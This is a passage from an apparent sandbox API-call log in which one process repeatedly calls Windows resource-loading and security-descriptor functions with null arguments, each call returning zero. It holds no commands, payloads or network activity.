lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.038] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.038] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.038] LockResource (hResData=0x0) returned 0x0 [0070.038] FreeResource (hResData=0x0) returned 0 [0070.038] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.038] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.038] LockResource (hResData=0x0) returned 0x0 [0070.038] FreeResource (hResData=0x0) returned 0 [0070.039] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.039] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.039] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.039] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.039] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.039] LockResource (hResData=0x0) returned 0x0 [0070.039] FreeResource (hResData=0x0) returned 0 [0070.039] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.039] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.039] LockResource (hResData=0x0) returned 0x0 [0070.039] FreeResource (hResData=0x0) returned 0 [0070.039] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.039] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.039] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.039] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.039] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.039] LockResource (hResData=0x0) returned 0x0 [0070.039] FreeResource (hResData=0x0) returned 0 [0070.039] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.039] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.039] LockResource (hResData=0x0) returned 0x0 [0070.039] FreeResource (hResData=0x0) returned 0 [0070.039] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.039] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.039] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.039] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.039] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.039] LockResource (hResData=0x0) returned 0x0 [0070.039] FreeResource (hResData=0x0) returned 0 [0070.039] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.039] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.039] LockResource (hResData=0x0) returned 0x0 [0070.039] FreeResource (hResData=0x0) returned 0 [0070.039] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.039] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.039] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.039] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.039] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.039] LockResource (hResData=0x0) returned 0x0 [0070.039] FreeResource (hResData=0x0) returned 0 [0070.039] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.039] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.039] LockResource (hResData=0x0) returned 0x0 [0070.039] FreeResource (hResData=0x0) returned 0 [0070.039] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.039] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.039] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.039] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.040] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.040] LockResource (hResData=0x0) returned 0x0 [0070.040] FreeResource (hResData=0x0) returned 0 [0070.040] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.040] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.040] LockResource (hResData=0x0) returned 0x0 [0070.040] FreeResource (hResData=0x0) returned 0 [0070.040] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.040] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.040] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.040] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.040] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.040] LockResource (hResData=0x0) returned 0x0 [0070.040] FreeResource (hResData=0x0) returned 0 [0070.040] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.040] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.040] LockResource (hResData=0x0) returned 0x0 [0070.040] FreeResource (hResData=0x0) returned 0 [0070.040] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.040] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.040] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.040] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.040] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.040] LockResource (hResData=0x0) returned 0x0 [0070.040] FreeResource (hResData=0x0) returned 0 [0070.040] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.040] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.040] LockResource (hResData=0x0) returned 0x0 [0070.040] FreeResource (hResData=0x0) returned 0 [0070.040] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.040] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.040] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.040] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.040] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.040] LockResource (hResData=0x0) returned 0x0 [0070.040] FreeResource (hResData=0x0) returned 0 [0070.040] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.040] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.040] LockResource (hResData=0x0) returned 0x0 [0070.040] FreeResource (hResData=0x0) returned 0 [0070.040] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.040] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.040] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.040] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.040] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.040] LockResource (hResData=0x0) returned 0x0 [0070.040] FreeResource (hResData=0x0) returned 0 [0070.040] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.040] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.041] LockResource (hResData=0x0) returned 0x0 [0070.041] FreeResource (hResData=0x0) returned 0 [0070.041] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.041] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.041] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.041] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.041] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.041] LockResource (hResData=0x0) returned 0x0 [0070.041] FreeResource (hResData=0x0) returned 0 [0070.041] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.041] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.041] LockResource (hResData=0x0) returned 0x0 [0070.041] FreeResource (hResData=0x0) returned 0 [0070.041] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.041] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.041] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.041] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.041] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.041] LockResource (hResData=0x0) returned 0x0 [0070.041] FreeResource (hResData=0x0) returned 0 [0070.041] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.041] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.041] LockResource (hResData=0x0) returned 0x0 [0070.041] FreeResource (hResData=0x0) returned 0 [0070.041] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.041] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.041] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.041] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.041] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.041] LockResource (hResData=0x0) returned 0x0 [0070.041] FreeResource (hResData=0x0) returned 0 [0070.041] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.041] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.041] LockResource (hResData=0x0) returned 0x0 [0070.041] FreeResource (hResData=0x0) returned 0 [0070.041] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.041] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.041] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.041] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.041] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.041] LockResource (hResData=0x0) returned 0x0 [0070.041] FreeResource (hResData=0x0) returned 0 [0070.041] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.041] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.041] LockResource (hResData=0x0) returned 0x0 [0070.041] FreeResource (hResData=0x0) returned 0 [0070.041] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.042] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.042] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.042] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.042] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.042] LockResource (hResData=0x0) returned 0x0 [0070.042] FreeResource (hResData=0x0) returned 0 [0070.042] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.042] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.042] LockResource (hResData=0x0) returned 0x0 [0070.042] FreeResource (hResData=0x0) returned 0 [0070.042] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.042] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.042] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.042] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.042] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.042] LockResource (hResData=0x0) returned 0x0 [0070.042] FreeResource (hResData=0x0) returned 0 [0070.042] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.042] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.042] LockResource (hResData=0x0) returned 0x0 [0070.042] FreeResource (hResData=0x0) returned 0 [0070.042] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.042] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.042] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.042] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.042] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.042] LockResource (hResData=0x0) returned 0x0 [0070.042] FreeResource (hResData=0x0) returned 0 [0070.042] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.042] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.042] LockResource (hResData=0x0) returned 0x0 [0070.042] FreeResource (hResData=0x0) returned 0 [0070.042] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.066] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.066] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.066] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.066] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.066] LockResource (hResData=0x0) returned 0x0 [0070.066] FreeResource (hResData=0x0) returned 0 [0070.066] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.066] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.066] LockResource (hResData=0x0) returned 0x0 [0070.066] FreeResource (hResData=0x0) returned 0 [0070.066] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.066] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.066] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.066] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.066] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.066] LockResource (hResData=0x0) returned 0x0 [0070.066] FreeResource (hResData=0x0) returned 0 [0070.066] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.066] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.066] LockResource (hResData=0x0) returned 0x0 [0070.066] FreeResource (hResData=0x0) returned 0 [0070.066] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.066] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.066] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.066] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.066] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.066] LockResource (hResData=0x0) returned 0x0 [0070.066] FreeResource (hResData=0x0) returned 0 [0070.066] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.066] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.066] LockResource (hResData=0x0) returned 0x0 [0070.066] FreeResource (hResData=0x0) returned 0 [0070.067] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.067] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.067] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.067] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.067] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.067] LockResource (hResData=0x0) returned 0x0 [0070.067] FreeResource (hResData=0x0) returned 0 [0070.067] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.067] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.067] LockResource (hResData=0x0) returned 0x0 [0070.067] FreeResource (hResData=0x0) returned 0 [0070.067] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.067] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.067] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.067] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.067] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.067] LockResource (hResData=0x0) returned 0x0 [0070.067] FreeResource (hResData=0x0) returned 0 [0070.067] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.067] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.067] LockResource (hResData=0x0) returned 0x0 [0070.067] FreeResource (hResData=0x0) returned 0 [0070.067] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.067] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.067] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.067] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.067] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.067] LockResource (hResData=0x0) returned 0x0 [0070.067] FreeResource (hResData=0x0) returned 0 [0070.067] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.067] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.067] LockResource (hResData=0x0) returned 0x0 [0070.067] FreeResource (hResData=0x0) returned 0 [0070.067] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.067] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.067] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.067] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.067] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.067] LockResource (hResData=0x0) returned 0x0 [0070.067] FreeResource (hResData=0x0) returned 0 [0070.067] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.067] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.067] LockResource (hResData=0x0) returned 0x0 [0070.067] FreeResource (hResData=0x0) returned 0 [0070.067] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.067] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.067] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.067] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.067] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.067] LockResource (hResData=0x0) returned 0x0 [0070.068] FreeResource (hResData=0x0) returned 0 [0070.068] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.068] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.068] LockResource (hResData=0x0) returned 0x0 [0070.068] FreeResource (hResData=0x0) returned 0 [0070.068] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.068] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.068] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.068] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.068] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.068] LockResource (hResData=0x0) returned 0x0 [0070.068] FreeResource (hResData=0x0) returned 0 [0070.068] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.068] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.068] LockResource (hResData=0x0) returned 0x0 [0070.068] FreeResource (hResData=0x0) returned 0 [0070.068] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.068] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.068] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.068] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 